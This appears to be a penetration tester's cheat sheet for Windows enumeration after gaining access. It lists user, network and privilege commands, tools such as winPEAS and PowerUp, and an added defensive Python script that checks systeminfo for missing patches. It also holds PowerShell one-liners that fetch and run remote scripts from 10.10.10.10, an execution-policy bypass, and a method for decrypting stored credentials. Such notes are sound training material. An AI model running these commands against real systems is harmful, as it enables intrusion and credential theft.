Initial Manual Enumeration

Start with the basics by hand, just to get a sense of what system you’re on and in what context.

Forms of Command Execution

CMD

echo %username%
cmd.exe /c echo %username%
C:\Windows\System32\cmd.exe /c echo %username%

PowerShell

powershell <command>
powershell write-host $env:username
powershell.exe <command>
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <command>
C:\Windows\System32\cmd.exe /c powershell <command>
C:\Windows\System32\cmd.exe /c powershell -enc <base64_encoded_command>

OS & Kernel

dir
systeminfo  # OS/kernel version and build; which hotfixes are applied?
hostname

Users

CMD

whoami              # Current username
echo %username%     # Current username

net users                       # All local users
net localgroup Administrators   # Who is inside Administrators group
whoami /all                     # Check current user privileges

# If domain attached
net user /domain
net user /domain %username%

PowerShell

write-host $env:username

Networking

# Config
ipconfig /all
route print
arp -a

# Network Connections & Firewall
netstat -ano
netsh firewall show state    # Legacy firewall context; on newer builds use: netsh advfirewall show allprofiles
netsh firewall show config

# Local network
net view

# Network shares
net share

Automated Enumeration

winPEAS


# Enable colors if executing from a Windows console (not needed for a reverse shell); /f overwrites an existing value without prompting
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 /f

winPEAS fast
winPEAS searchfast
winPEAS cmd

Seatbelt

Seatbelt.exe all

PowerUp

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

Take it with a grain of salt; it didn’t catch MS15-051.

Windows Exploit Suggester

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python -m pip install xlrd
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -i systeminfo -d <latest>.xls

# Are there any exploits that line up with existing/compilable binaries?
https://github.com/SecWiki/windows-kernel-exploits
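The suggester above consumes saved `systeminfo` output and matches the OS build and installed KBs against its bulletin database. The following added example (not part of these notes or of Windows Exploit Suggester) does the same front half from a patch-audit angle: it parses a constructed `systeminfo` sample, pulls out the version and hotfix fields, and reports which KBs from a baseline list are missing, so a defender can check patch state on a host before anyone else does. The hostname, build and KB numbers are made up.

```python
import re
from typing import Dict, List

# Constructed sample of `systeminfo` output; hostname, build and KB numbers
# are invented for the example and are not real findings.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WORKSTATION01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5011048
                           [02]: KB5012170
                           [03]: KB5034763
Network Card(s):           1 NIC(s) Installed.
"""

# "Key:   value" lines start at column 0; continuation lines are indented.
FIELD_RE = re.compile(r"^(\S[^:]*):\s+(.*)$", re.MULTILINE)
# Hotfix continuation lines look like "[01]: KB5011048".
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract the fields a patch-level comparison needs from systeminfo text."""
    fields = {k.strip(): v.strip() for k, v in FIELD_RE.findall(text)}
    hotfixes = sorted({kb.upper() for kb in HOTFIX_RE.findall(text)})
    return {
        "host": fields.get("Host Name", ""),
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "arch": fields.get("System Type", ""),
        "hotfixes": hotfixes,
    }


def missing_hotfixes(info: Dict[str, object], required: List[str]) -> List[str]:
    """Return the KBs from a required baseline that the host has not installed."""
    installed = set(info["hotfixes"])
    return sorted(kb.upper() for kb in required if kb.upper() not in installed)


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], info["os_version"], info["arch"])
    print("installed:", ", ".join(info["hotfixes"]))
    # The baseline list is also constructed for the example.
    print("missing:", missing_hotfixes(info, ["KB5012170", "KB5040427"]))
```

To run it against a real host, save `systeminfo > systeminfo.txt` and pass the file contents to `parse_systeminfo`; the baseline list would come from your own patch-management source.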

PowerShell

Everyday Commands

# Download a file
IWR -Uri http://10.10.10.10/file.exe -OutFile C:\file.exe

# Execute a remote PowerShell Script
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/script.ps1')
# OR
IEX(IWR('http://10.10.10.10/script.ps1'))

# Show the environment variables
dir env:

Decrypt SecureString

$ss = Import-CliXml -Path file.xml  # Import file.xml, a PSCredential exported with Export-CliXml (password stored as a SecureString)
$ss.GetNetworkCredential().<propN>  # Decrypt the prop; the SecureString is DPAPI-protected, so this only works as the user (and on the machine) that exported it